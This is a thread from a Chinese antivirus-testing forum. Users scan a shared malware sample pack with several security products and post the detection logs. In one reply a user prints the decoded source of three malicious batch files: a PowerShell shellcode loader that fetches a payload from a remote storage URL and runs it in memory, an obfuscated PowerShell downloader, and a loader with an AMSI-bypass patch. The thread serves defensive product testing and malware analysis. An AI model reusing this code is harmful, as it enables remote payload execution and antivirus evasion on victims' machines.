收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 【开放测试】卡饭病毒样本包 20240714 第144期
123456下一页
返回列表 发新帖
楼主: wwwab
 收起左侧

[病毒样本] 【开放测试】卡饭病毒样本包 20240714 第144期

  [复制链接]
Nocria
发表于 2024-7-14 21:22:56 | 显示全部楼层
本帖最后由 Nocria 于 2024-7-14 21:52 编辑

IKARUS - 14/26


  1. [14.07.2024 21:41:59] On-demand scan started: "TemporaryScan {a39a5454-a251-4cfd-9c9c-ce1b7beb2872}"
  2. [14.07.2024 21:41:59] Found, 0.02s, SigName: "Trojan.JS.Kilim", SigId: 2320675, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\1PDF.FaturaDetay_202407.exe"
  3. [14.07.2024 21:42:05] Found, 1.83s, SigName: "Trojan.Win32.Crypt", SigId: 5503297, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\arwbjuh.exe"
  4. [14.07.2024 21:42:05] Found, 0.06s, SigName: "Trojan.PowerShell.Crypt", SigId: 4994156, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\black.bat"
  5. [14.07.2024 21:42:05] Found, 0.13s, SigName: "Trojan.Win32.Crypt", SigId: 5503297, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\bjutbht.exe"
  6. [14.07.2024 21:42:05] Found, 0.05s, SigName: "Trojan.Win32.Krypt", SigId: 501583477, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\borlndmm.dll"
  7. [14.07.2024 21:42:05] Found, 0.09s, SigName: "Trojan.Win32.Generic", SigId: 5401060, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\ccleaner.exe"
  8. [14.07.2024 21:42:05] Found, 0.05s, SigName: "Win32.SuspectCrc", SigId: 501426243, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\DHL_PT563857935689275783656385FV-GDS3535353.bat"
  9. [14.07.2024 21:42:07] Found, 2.01s, SigName: "Trojan.Win32.Crypt", SigId: 5503297, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\dwvhgtd.exe"
  10. [14.07.2024 21:42:07] Found, 0.01s, SigName: "Trojan.PowerShell.Crypt", SigId: 4242285, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\PDF.exe"
  11. [14.07.2024 21:42:07] Found, 0.12s, SigName: "Trojan.Win32.Crypt", SigId: 5503297, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\file.exe"
  12. [14.07.2024 21:42:07] Found, 0.03s, SigName: "Trojan.JS.Kilim", SigId: 2320675, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\PDF.FaturaDetay_202407.exe"
  13. [14.07.2024 21:42:07] Found, 0.03s, SigName: "Trojan.JS.Kilim", SigId: 2320675, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\SIP.03746.XSLSX.exe"
  14. [14.07.2024 21:42:07] Found, 2.21s, SigName: "Trojan.Python.SLoader", SigId: 5369181, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\Built.exe"
  15. [14.07.2024 21:42:08] Found, 0.48s, SigName: "Trojan.Win32.Crypt", SigId: 5292770, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\setup.exe"
  16. [14.07.2024 21:42:08] On-demand scan FINISHED: "TemporaryScan {a39a5454-a251-4cfd-9c9c-ce1b7beb2872}"
  17. [14.07.2024 21:42:08] ----------------------------------------------------
  18. [14.07.2024 21:42:08] Directories scanned: 2
  19. [14.07.2024 21:42:08] Files scanned: 51
  20. [14.07.2024 21:42:08] Virus found: 14
  21. [14.07.2024 21:42:08] ----------------------------------------------------
复制代码
_____________________________________

EMSISOFT - 12/26



  1. 2024/7/14 21:50:09
  2. Scanner detected Malware "Gen:Variant.Tedy.577745 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\1PDF.FaturaDetay_202407.exe -> (Smart) -> 0"

  4. 2024/7/14 21:50:11
  5. Scanner detected Malware "Gen:Variant.Tedy.577745 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\PDF.FaturaDetay_202407.exe -> (Smart) -> 0"

  7. 2024/7/14 21:50:11
  8. Scanner detected Malware "Gen:Variant.Tedy.577745 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\SIP.03746.XSLSX.exe -> (Smart) -> 0"

  10. 2024/7/14 21:50:13
  11. Scanner detected Malware "Gen:Variant.Doina.74764 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\setup.exe -> (Instyler o) -> (Instyler Module 16)"

  13. 2024/7/14 21:50:13
  14. Scanner detected Malware "Gen:Heur.Munp.1 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\setup.exe -> (Instyler o) -> (Instyler Module 17)"

  16. 2024/7/14 21:50:15
  17. Scanner detected Malware "Gen:Variant.Babar.460990 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\7a0395c75ac633d66a7a9f2690cbdb9c90ac5b0fc4f9273b6e0cf16f70eedd8e.exe" (SHA1: 8f4569d6233bb9ba161a68527ee9b8e8c04a63bb)

  19. 2024/7/14 21:50:15
  20. Scanner detected Malware "Gen:Variant.Fragtor.597921 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\arwbjuh.exe" (SHA1: d9b9d23b2c320efcaf54ddcba8b42540f3934aa0)

  22. 2024/7/14 21:50:15
  23. Scanner detected Malware "Trojan.Generic.36541240 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\borlndmm.dll" (SHA1: 8be6dfa8e216d2f7b68f2ab05e63a78fa51374f6)

  25. 2024/7/14 21:50:15
  26. Scanner detected Malware "Trojan.GenericKD.73480402 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\DHL_PT563857935689275783656385FV-GDS3535353.bat" (SHA1: 880c7f14743f9759b30bcc28085949122f54c20e)

  28. 2024/7/14 21:50:15
  29. Scanner detected Malware "Gen:Variant.Fragtor.597921 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\dwvhgtd.exe" (SHA1: 2c48027755783d35b163a43b62ffafba8345155d)

  31. 2024/7/14 21:50:15
  32. Scanner detected Malware "Trojan.GenericKD.73495776 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\helper.bat" (SHA1: 64ab8a696b52189d5fd809da924d1dc36e07d7c3)

  34. 2024/7/14 21:50:15
  35. Scanner detected Malware "Gen:Variant.Babar.460990 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\DTLite.exe" (SHA1: a7b956a4aca4624fb466a932d49fb3268a42b7e2)
复制代码



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 2经验 +10 人气 +1 收起 理由
QVM360 + 10 版区有你更精彩: )
天狐狐狐 + 1 感谢支持,欢迎常来: )

查看全部评分

回复

举报

东南大学
发表于 2024-7-14 21:26:44 | 显示全部楼层
本帖最后由 东南大学 于 2024-7-14 21:52 编辑

CS解压杀11,扫描杀3,余12
  1. 1PDF.FaturaDetay_202407.exe
  2. 3e6642f7100bb72137d68b5aa34a2d1f1a75722ab7d2b15987bbdeb84bc3265e.exe
  3. 64ec6562b96016699c6ae14166f4d31bde2b160eaa84d34a661fc2943017202e.exe
  4. 7a0395c75ac633d66a7a9f2690cbdb9c90ac5b0fc4f9273b6e0cf16f70eedd8e.exe
  5. black.bat
  6. borlndmm.dll
  7. DHL_PT563857935689275783656385FV-GDS3535353.bat
  8. DTLite.exe
  9. helper.bat
  10. PDF.FaturaDetay_202407.exe
  11. setup.exe
  12. SIP.03746.XSLSX.exe
复制代码
回复

举报

YU2711
发表于 2024-7-14 21:55:15 | 显示全部楼层
本帖最后由 YU2711 于 2024-7-14 23:19 编辑

Avira 解压+扫描19x

双击(均阻止行为本体未杀)

black.bat阻止行为


剩余2个.bat Miss

Trend Micro 监控+扫描14x


双击


PDF.exe阻止PS运行

black.bat



1PDF.exe PDF.Fatura.exe Sip03.exe helper.bat Miss

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +30 收起 理由
QVM360 + 30 版区有你更精彩: )

查看全部评分

回复

举报

驭龙
发表于 2024-7-14 22:31:10 | 显示全部楼层
诺顿V22,智能下载和文件监控,剩余9个,未双击

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +5 收起 理由
QVM360 + 5 版区有你更精彩: )

查看全部评分

回复

举报

GreatMOLA
发表于 2024-7-14 22:52:36 | 显示全部楼层
本帖最后由 GreatMOLA 于 2024-7-14 22:55 编辑

Deep Instinct

扫描 14x



PreventedMalware - SpywareC:\Users\User1211\Desktop\infected2024071401\Downloads\file.exe
PreventedMalware - TrojanC:\Users\User1211\Desktop\infected2024071401\Downloads\SIP.03746.XSLSX.exe
PreventedMalware - DropperC:\Users\User1211\Desktop\infected2024071401\Downloads\PDF.exe
PreventedMalware - SpywareC:\Users\User1211\Desktop\infected2024071401\Downloads\arwbjuh.exe
PreventedMalware - SpywareC:\Users\User1211\Desktop\infected2024071401\Downloads\dwvhgtd.exe
PreventedMalware - TrojanC:\Users\User1211\Desktop\infected2024071401\Downloads\PDF.FaturaDetay_202407.exe
PreventedMalware - RansomwareC:\Users\User1211\Desktop\infected2024071401\Downloads\1PDF.FaturaDetay_202407.exe
PreventedMalware - VirusC:\Users\User1211\Desktop\infected2024071401\Downloads\7a0395c75...0cf16f70eedd8e.exe
PreventedDual Use - Investigation ToolC:\Users\User1211\Desktop\infected2024071401\Downloads\DTLite.exe
PreventedMalware - DropperC:\Users\User1211\Desktop\infected2024071401\Downloads\setup.exe
PreventedMalware - VirusC:\Users\User1211\Desktop\infected2024071401\Downloads\3e6642f710...eb84bc3265e.exe
PreventedMalware - VirusC:\Users\User1211\Desktop\infected2024071401\Downloads\ccleaner.exe
PreventedPUA - DownloaderC:\Users\User1211\Desktop\infected2024071401\Downloads\Built.exe


执行

相同行为的PE文件 8x:

PreventedBehavioral Analysis - Remote Code InjectionC:\Users\User1211\Desktop\infected2024071401\Downloads\d87e2dcd2eb97...ce9f5ddf96d.exe
PreventedBehavioral Analysis - Remote Code InjectionC:\Users\User1211\Desktop\infected2024071401\Downloads\a33245a27c02bb...699fe81c48a.exe
PreventedBehavioral Analysis - Remote Code InjectionC:\Users\User1211\Desktop\infected2024071401\Downloads\901478668c0...4470f3d4.exe
PreventedBehavioral Analysis - Remote Code InjectionC:\Users\User1211\Desktop\infected2024071401\Downloads\938b7e042bd...a826598.exe
PreventedBehavioral Analysis - Remote Code InjectionC:\Users\User1211\Desktop\infected2024071401\Downloads\644d928a4...29c0325.exe
PreventedBehavioral Analysis - Remote Code InjectionC:\Users\User1211\Desktop\infected2024071401\Downloads\64ec6562b96...c2943017202e.exe
PreventedBehavioral Analysis - Remote Code InjectionC:\Users\User1211\Desktop\infected2024071401\Downloads\96d1bc7dec...fa909dd6bb7.exe
PreventedBehavioral Analysis - Remote Code InjectionC:\Users\User1211\Desktop\infected2024071401\Downloads\4c40337...d35c354a7792.exe

Black.bat



  1. powershell $ProgressPreference = SilentlyContinue
  2. function LookupFunc {
  3.     Param $moduleName, $functionName
  4.     $assem = [AppDomain]::CurrentDomain.GetAssemblies | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split\\[-1].EqualsSystem.dll}.GetTypeMicrosoft.Win32.UnsafeNativeMethods
  5.     $tmp = $assem.GetMethods | ForEach-Object {If$_.Name -eq GetProcAddress {$_}}
  6.     $handle = $assem.GetMethodGetModuleHandle.Invoke$null, @$moduleName;
  7.     [IntPtr] $result = 0;
  8.     try {
  9.         Write-Host First Invoke - $moduleName $functionName;
  10.         $result = $tmp[0].Invoke$null, @$handle, $functionName;
  11.     }catch {
  12.         Write-Host Second Invoke - $moduleName $functionName;
  13.         $handle = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @$null, $handle;
  14.         $result = $tmp[0].Invoke$null, @$handle, $functionName;
  15.     }
  16.     return $result;
  17. }
  18. function getDelegateType {
  19.     Param [ParameterPosition = 0, Mandatory = $True] [Type[]] $func,[ParameterPosition = 1] [Type] $delType = [Void]
  20.     $type = [AppDomain]::CurrentDomain.DefineDynamicAssemblyNew-Object System.Reflection.AssemblyNameReflectedDelegate, [System.Reflection.Emit.AssemblyBuilderAccess]::Run.DefineDynamicModuleInMemoryModule, $false.DefineTypeMyDelegateType,Class, Public, Sealed, AnsiClass, AutoClass, [System.MulticastDelegate]
  21.     $type.DefineConstructorRTSpecialName, HideBySig, Public,[System.Reflection.CallingConventions]::Standard, $func.SetImplementationFlagsRuntime, Managed
  22.     $type.DefineMethodInvoke, Public, HideBySig, NewSlot, Virtual, $delType, $func.SetImplementationFlagsRuntime, Managed
  23.     return $type.CreateType
  24. }

  26. [Byte[]] $buf = iWr -UsEb https://upnow-prod.ff45e40d1a1c8f7e7de4e976d0c9e555.r2.cloudflarestorage.com/BJkvbFojWPUQauDK61Bs1H7mPvG3/a9cbfe91-5e7f-47a9-a05c-9eaac5bb2e3c?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=cdd12e35bbd220303957dc5603a4cc8e%2F20240714%2Fauto%2Fs3%2Faws4_request&X-Amz-Date=20240714T063356Z&X-Amz-Expires=43200&X-Amz-Signature=254013c4e1bf47e1cd80433c8ed254a6448661c0be1c9d52c343bbe888f87cb6&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D%22out.bin%22.content
  27. $lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointerLookupFunc kernel32.dll VirtualAlloc,getDelegateType @[IntPtr], [UInt32], [UInt32], [UInt32][IntPtr].Invoke[IntPtr]::Zero, $buf.length, 0x3000, 0x40
  28. [System.Runtime.InteropServices.Marshal]::Copy$buf, 0, $lpMem, $buf.length
  29. $hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointerLookupFunc kernel32.dll CreateThread,getDelegateType @[IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr][IntPtr].Invoke[IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero
  30. [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointerLookupFunc kernel32.dll WaitForSingleObject,getDelegateType @[IntPtr], [Int32][Int].Invoke$hThread, 0xFFFFFFFF
复制代码

borlndmm.dll

检测虚拟机,无动作,miss.

DHL_PT563857935689275783656385FV-GDS3535353.bat



  1. powershell.exe  -windowstyle hidden "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke(     $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ &   ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv  EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6  em4.ogi;Tylv  ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp  redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um,  U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC e[过滤]ebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst  cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole  o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub  ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop  Udd[Ba.iN Ddse.rdltOver.Ori,SDiadeHartcbundu Eror FreiHekst ProyRevaPwronrUn,ooTenot GipoBjr cTypeoPhycl RetTBedlyAchap .ide Sma]Repr:prec:AkklTNongl DatsPhen1Koor2Rume ');$urtesupper=$gawkihood[0];$enteroanastomosis= (Oktantals ' .le$hvidg.ykelKurtoTilkbH mpaCoutlDivi:A keMVerioSalvnUnr tSkyggstilo,istl,ammf ,raiBrowebro.rChlo=  etNdiste UnswBil,- W iOColobAbonjAutoeMongccli tForu   amS porySvedsF jlt lageDownmBrss.UnshNIn.ae I.tt.hal.Di.eWDevaeOxtabFredCPhillConfiForte.illnS.det');$enteroanastomosis+=$Mbelpoliturer[1];Oncogenes ($enteroanastomosis);Oncogenes (Oktantals 'b.gr$ .llMTutooLangnOwkrt D.ng,leao Hagl efifProti BlyeTonsrRemo.K.anHKr leUganaDrifdUdhneFe.drAcolssemi[ Fo.$EfteMB.uso PolralvevFintiSpe,nwife]Dok.=Inn,$I dvKre,nlkl.maAto,gSystekartfXylorBleniSkyfsRoletGreg ');$Makkede=Oktantals 'Unde$ PosMC.aco.xprnF.rstDemog lanoAmt.l,dlafSatsiPo aeHalvrJezr.SpeeDalphokiwaw Afsn.dstlVi ioLav,aWrapdPja.FGaduiS.nelGrebecons(,ell$Dec uFir,rLandtLigueHjalsNonouHavrp B spReane,roarre.s, E,s$RelaAIndifskrig MutrTalb)T.sk ';$Afgr=$Mbelpoliturer[0];Oncogenes (Oktantals 'Belr$Ln,ogOu,plEdapo PerbEx,eaSworl Des:Ud iEKig,gNonplDataaMegatAn,reStacrEskaeGro.sEkam=Flys(BygkT fr.eUnf s,rontgau.-wifoPBankaUplit .akhSelv Ked.$S.riA Bolf .umgDuchrBagg) Nav ');while (!$Eglateres) {Oncogenes (Oktantals 'K,rr$ calg Prol Ubeo An,bTra.aKernlMusl:UranD ConuSorrgOre a oinnBryg=Cen.$ForrtAfbrrUdrauR.vae Ani ') ;Oncogenes $Makkede;Oncogenes (Oktantals 'FormSldertBe.la V,rr eletTeks-BlepSLooklM.sse,entePr.npampo Olin4Macr ');Oncogenes (Oktantals 'Pidd$MissgScholFo,soAf,ib HjeaFreklCros:Vrt E A.dg.upelvendaLycot Re,ecracrDeave Subs nco=Bill(bossTAfveeUp rs lintSubs-ParaP RisaForet,andhMo.g Aarb$DecuAWoodfPatrgOculrInds) Pri ') ;Oncogenes (Oktantals 'G ur$ lgtg.efelShoooCivibBreaa UnclAppa:FaenE TaaxYethpPolylfareoLongdS.afeE,parSa.c=Scre$C mmg NemlMedioWhimb edua.ensl.nas: LocrAspeeHe,tnCanotT.skvSkibiU,kisWi,etGod,ehalonBe,o+,axc+Fini%Circ$RickgDermaMindwUndekStani C ih.renoAs.mo.ecudOpfy.SmutcflyvoRussu,ilhn PantLega ') ;$urtesupper=$gawkihood[$Exploder];}$Selvflelsers=333309;$Topfigur=29064;Oncogenes (Oktantals ' Op,$C,rrgHapplV ntodi.ibBrodaKni limpo:H,ejTRambrWigsvPonoa UnprPolee H tnKa o  Skr=Lgne  MgrGAu,ee Ra t Int-,edaCGhosoStavnTurbtMi pe spin nddtMusk Mind$ ,trAH.rsfD.srgMe,drRuts ');Oncogenes (Oktantals ' Dok$InexgDigtlU,weo flobeli,aB,dil,iot: Gl,PAn yaskoldSkj.d thae Forh Kona,lejtDihytPl deLattss,rkkItalyAkt eGentrBikonTlpeePlugsTruc h.ne=Codl Kula[HalvSS aayB.evsStagt ande orkmdimi. OmdCAdreoS,ren Es v.efueOverrReolt Imp]Mast: Veg: bibFsemir UnpoD,gtmTro,BStatasparsP.mpeAlmo6Hydr4gasaSSpant Me.rSlriiAsymn S ug  am(Samn$PjkkTS uir InfvGge,aFremrHumeeUnfenGa.g)Co.q ');Oncogenes (Oktantals 'Stet$SmiggOprel AneoAc,obB ysaP aslSt.m:ForvUVr ebRep,e Pt.hUni,j Di.lPo.epEp.dsCapioVarmmReplmRevieBorts Pir .aca=Di.e  Hem[Ca.bS StoyBuffsAndet Hane  nkm.hae.kanaTConne uudxBnkptYeh..sp tERechn urgc LinoTu.bd Su icompn Alcg Uo.]Erad: ini:LandAmytiSAsseC sp.ITalbIGrip.JuleG D veAlmet,istSUdflt Storbestirssnn Unfg,erc( Na.$SighPTkkeaStridDesod BoheRobihOvera S ot,asttTurneBalas MankTvisy accePsycrStranC,ple Yd,s Sp.) Glu ');Oncogenes (Oktantals 'Unf.$ rodgMar,lSlagoCarpb M.naPsyklCyli:DiscBAlg iSlanoMen lCounoStang Trie MerrTaxanMelleS was.ver1D,al9U sa6Sigi=Delp$F lmUF,rsbMed eSa,ihGarnj YellsrtrpKolos resoBattm BejmFerreAspisC.nc.Serjs JewuThrob S rsLrketTrafrRejniSergnSt dgAnti( Jai$Jer,S ProeGroclCi.ivI urf AerlUdvaeB,uglchi,sArmhe.onnrAf is nde,,rko$InddT  ecoSengpHimmfKlkkiIm.rg LytuTensrHaan)Pink ');Oncogenes $Biologernes196;"
复制代码



helper.bat



  1. powershell function Invoke-SharpLoader
  2. {

  4. Param
  5.    
  6.         [ParameterMandatory=$true]
  7.         [string]
  8.         $location,
  9.         [ParameterMandatory=$true]
  10.             [string]
  11.         $password,
  12.         [string]
  13.         $argument,
  14.         [string]
  15.         $argument2,
  16.         [string]
  17.         $argument3,
  18.         [Switch]
  19.         $noArgs
  20.         

  22. $sharploader = @
  23. using System;
  24. using System.Net;
  25. using System.Text;
  26. using System.IO;
  27. using System.Linq;
  28. using System.Reflection;
  29. using System.Security.Cryptography;
  30. using System.IO.Compression;
  31. using System.Runtime.InteropServices;

  33. namespace SharpLoader
  34. {
  35.     public class gofor4msi
  36.     {
  37.         static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
  38.         static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };

  40.         public static void now
  41.         {
  42.             if is64Bit
  43.                 goforx64;
  44.             else
  45.                 goforx86;
  46.         }

  48.         private static void goforbyte[] patch
  49.         {
  50.             try
  51.             {
  52.                 var a = am;
  53.                 var si = si;
  54.                 var dll = .dll;
  55.                 var lib = Win32.LoadLibraryasidll;
  56.                 var Am = Am;
  57.                 var siScan = siScan;
  58.                 var Buffer = Buffer;
  59.                 var addr = Win32.GetProcAddresslib, AmsiScanBuffer;

  61.                 uint oldProtect;
  62.                 Win32.VirtualProtectaddr, UIntPtrpatch.Length, 0x40, out oldProtect;

  64.                 Marshal.Copypatch, 0, addr, patch.Length;
  65.             }
  66.             catch Exception e
  67.             {
  68.                 Console.WriteLine [x] {0}, e.Message;
  69.                 Console.WriteLine [x] {0}, e.InnerException;
  70.             }
  71.         }

  73.         private static bool is64Bit
  74.         {
  75.             bool is64Bit = true;

  77.             if IntPtr.Size == 4
  78.                 is64Bit = false;

  80.             return is64Bit;
  81.         }
  82.         class Win32
  83.         {
  84.             [DllImportkernel32]
  85.             public static extern IntPtr GetProcAddressIntPtr hModule, string procName;

  87.             [DllImportkernel32]
  88.             public static extern IntPtr LoadLibrarystring name;

  90.             [DllImportkernel32]
  91.             public static extern bool VirtualProtectIntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect;
  92.         }
  93.     }
  94.     public class Program
  95.     {
  96.         public static void PrintBanner
  97.         {
  98.             
  99.         }
  100.         public static string Get_Stage2string url
  101.         {
  102.             try
  103.             {
  104.                 HttpWebRequest myWebRequest = HttpWebRequestWebRequest.Createurl;
  105.                 IWebProxy webProxy = myWebRequest.Proxy;
  106.                 if webProxy != null
  107.                 {
  108.                     webProxy.Credentials = CredentialCache.DefaultNetworkCredentials;
  109.                     myWebRequest.Proxy = webProxy;
  110.                 }
  111.                 HttpWebResponse response = HttpWebResponsemyWebRequest.GetResponse;
  112.                 Stream data = response.GetResponseStream;
  113.                 string html = String.Empty;
  114.                 using StreamReader sr = new StreamReaderdata
  115.                 {
  116.                     html = sr.ReadToEnd;
  117.                 }
  118.                 return html;
  119.             }
  120.             catch Exception
  121.             {
  122.                 Console.ForegroundColor = ConsoleColor.Red;
  123.                 Console.WriteLine;
  124.                 Console.WriteLine\n[!] Whoops, there was a issue with the url...;
  125.                 Console.ResetColor;
  126.                 return null;
  127.             }
  128.         }
  129.         public static string Get_Stage2diskstring filepath
  130.         {
  131.             string folderPathToBinary = filepath;
  132.             string base64 = System.IO.File.ReadAllTextfolderPathToBinary;
  133.             return base64;
  134.         }
  135.         public static byte[] AES_Decryptbyte[] bytesToBeDecrypted, byte[] passwordBytes
  136.         {
  137.             byte[] decryptedBytes = null;
  138.             byte[] saltBytes = new byte[] { 1, 2
复制代码



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 2经验 +30 人气 +3 收起 理由
QVM360 + 30 优秀!
隔山打空气 + 3

查看全部评分

回复

举报

GreatMOLA
发表于 2024-7-14 23:18:06 | 显示全部楼层
驭龙 发表于 2024-7-14 22:31
诺顿V22,智能下载和文件监控,剩余9个,未双击

扫描结果一致。


执行



SONAR全部拦截,风光犹在。



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 2经验 +10 人气 +3 收起 理由
QVM360 + 10 版区有你更精彩: )
驭龙 + 3 SONAR果然是好东西,可惜N没有了

查看全部评分

回复

举报

孤勇者
发表于 2024-7-15 09:43:59 | 显示全部楼层
dght432 发表于 2024-7-14 19:59
卡巴斯基剩余5个

免费版用多步主防,付费版用单步主防,在对已知样本没有区别,但在对未知样本是有区别的,单步主防更优越
回复

举报

wwwab
 楼主| 发表于 2024-7-15 10:27:00 | 显示全部楼层
StarlitFuture 发表于 2024-7-14 21:15
COMODO 2025 TDT Block 1,剩余入沙

@驭龙 竟然是Intel TDT Events

评分

参与人数 1人气 +3 收起 理由
驭龙 + 3 TDT真的是难得出来露脸一次啊,可惜不是ESE.

查看全部评分

回复

举报

wwwab
 楼主| 发表于 2024-7-15 10:42:18 | 显示全部楼层
swizzer 发表于 2024-7-14 18:28
华为
实时防护 7/26

@华为安全官方 HUAWEI System Killer
回复

举报

shuiyue96
发表于 2024-7-15 11:12:17 | 显示全部楼层
诺顿V22,文件监控+扫描,剩余11个,未双击。已经更新到最新

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +5 收起 理由
QVM360 + 5 版区有你更精彩: )

查看全部评分

回复

举报

下一页 »
123456下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-15 12:21 , Processed in 0.112308 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表